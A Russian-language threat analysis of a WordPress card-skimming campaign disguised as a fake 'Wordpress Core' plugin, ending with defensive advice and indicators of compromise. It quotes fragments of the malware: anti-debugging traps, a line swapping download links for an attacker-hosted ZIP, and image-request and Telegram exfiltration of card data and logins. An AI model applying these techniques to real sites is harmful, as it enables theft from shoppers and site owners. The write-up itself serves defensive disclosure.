Обнаружена беспрецедентная модульная вредоносная кампания, маскирующаяся под плагин WordPress: глубокий анализ угрозы

Наиболее тревожным аспектом стал невиданный ранее метод: одна из вариаций включала живую бэкенд-систему, размещенную прямо на инфицированных сайтах, упакованную в виде поддельного плагина WordPress. Исследование показало, что кампания действует с сентября 2023 года, что свидетельствует о длительной целевой атаке на множество организаций. Анализ более 20 образцов кода раскрыл уникальные детали эволюции этого фреймворка.

Сложные методы противодействия анализу

Все образцы используют идентичные техники обфускации и продвинутые механизмы уклонения от обнаружения. Ключевой особенностью является детектирование инструментов разработчика (Chrome DevTools, Firefox Developer Tools): вредоносный код динамически изменяет поведение при открытии консоли. Алгоритм непрерывно сравнивает разницу между window.outerWidth/innerWidth и outerHeight/innerHeight, отправляя кастомное событие "devtoolschange". Значительная разница в размерах указывает на активность инструментов разработки, после чего вредонос блокирует выполнение. Еще более изощренные методы включают:

• Бесконечные циклы: функции вида "constructor("while (true) {}").apply("counter")" намеренно зависают вкладки браузера.
• Ловушки отладчика: конструкция "constructor("debugger").call("action")" приостанавливает выполнение при открытых DevTools.
• Блокировка горячих клавиш: код деактивирует F12, Ctrl+Shift+I/J, Ctrl+U и контекстное меню, препятствуя доступу к исходному коду и инструментам.
• Перехват консоли: динамическое переопределение методов console.log(), warn(), error() затрудняет отладку путем подмены стандартных функций.

Избирательность выполнения и целевой сбор данных

Вредонос проявляет исключительную избирательность:

• Обходит административные панели WordPress, устанавливая cookie "wp-admin" для идентификации.
• Активируется только на страницах оплаты ("window.location.toString().indexOf("checkout")").
• Игнорирует адреса из "белого списка", чтобы избежать тестовых сред.
• Использует сложные поддельные формы оплаты, включая:
  • Прямой перехват данных полей ввода (номера карт, CVV, имен).
  • Инъекцию Base64-кодированных HTML-форм, имитирующих легитимные платежные системы.
  • Псевдовалидацию с визуальной обратной связью (подсветка ошибок, маски ввода для Visa/Mastercard/AmEx).
  • Фальшивые Cloudflare-капчи с локализацией на 12 языков, поддержкой RTL и темной темы.

Механизмы эксфильтрации и маскировки

Украденные данные проходят многоступенчатое кодирование:

1. Конкатенация в строку с разделителями "|".
2. Кодирование в Base64.
3. Дополнительное преобразование через пользовательскую схему (добавление "%" между символами).
4. Передача через поддельные запросы к изображениям ("<img src="https://[redacted]/img-info/image-view.php?data-view=..."").

Социальная инженерия достигает апогея: после кражи данных скрипт имитирует сбои платежных шлюзов ("The payment gateway is currently unavailable"), чтобы задержать обнаружение.

Нескимминговые варианты: многофункциональная платформа

Семейство действует как полноценный фреймворк:

1.  Мошенническая реклама: показ целевых объявлений пользователям с мобильных устройств, пришедших из поисковых систем (Google, Bing) или соцсетей (Facebook*, TikTok). Используется динамическая вставка скриптов Google AdSense.
2. Кража учетных данных: перехват логинов/паролей WordPress через wp-login.php с передачей данных в формате "логин|пароль|userAgent|разрешение экрана|таймзона".
3. Подмена контента: замена легитимных ссылок на ZIP-архивы вредоносными версиями ("jQuery("a[href*='...zip']").attr("href", "https://attacker/...zip")").
4. Телеметрия Telegram: отправка системных данных, IP и действий пользователя напрямую в Telegram-бот через API.

Революционный вектор: вредонос как WordPress-плагин

Наиболее опасный образец распространяется как поддельный плагин "Wordpress Core" (с намеренной орфографической ошибкой). Он реализует:

1. Серверную инфраструктуру: создает кастомный тип записей "messages" для хранения украденных данных.
2. Интеграцию с WooCommerce: добавляет мошеннический раздел в "My Account", отображая заказы без соответствующих прав.
3. Манипуляцию статусами заказов: автоматически меняет статус платежей с "processing" на "completed", используя хуки "woocommerce_thankyou" и "wp_footer", чтобы скрыть мошеннические транзакции.
4. Локальное хранение конфигураций: применение localStorage для сохранения настроек между сессиями.

Защита и рекомендации

Wordfence выпустил сигнатуры для детектирования угрозы, доступные для Premium/Care/Response-клиентов и платных пользователей CLI. Бесплатные версии получат обновления через 30 дней. Для защиты критически важно:

1. Проверять неизвестные плагины, особенно с опечатками в названиях.
2. Мониторить необычную активность на страницах оплаты.
3. Анализировать подозрительные запросы к изображениям с параметрами data-view.
4. Блокировать несанкционированный доступ к Telegram API.

Данная кампания демонстрирует беспрецедентную адаптивность: от AI-генерируемого кода до эксплуатации легитимных веб-технологий для создания устойчивых бэкенд-систем на зараженных ресурсах. Это знаменует новый этап в эволюции киберугроз, требующий усиления многоуровневой защиты. Эксперты продолжают анализ фреймворка, предупреждая о возможном появлении новых модулей.

*компания Meta Platforms Inc., владеющая Facebook и Instagram, внесена в реестр экстремистских организаций, ее деятельность в России по поддержанию указанных соцсетей признана экстремистской

Domains

• advertising-cdn.com
• api-service-188910982.website
• blastergallery.com
• chaolingtech.com
• contentsdeliverystat.com
• deliveryrange.pro
• emojiselect.info
• graphiccloudcontent.com
• imagifytext.com
• internetmemoryservice.com
• staticdelivery.net
• vectorimagefabric.com
• vectorizegraphic.com

URLs

• api.telegram.org/bot7468776395[…]chat_id=-4672047987

Google ads client

• ca-pub-9514222065914327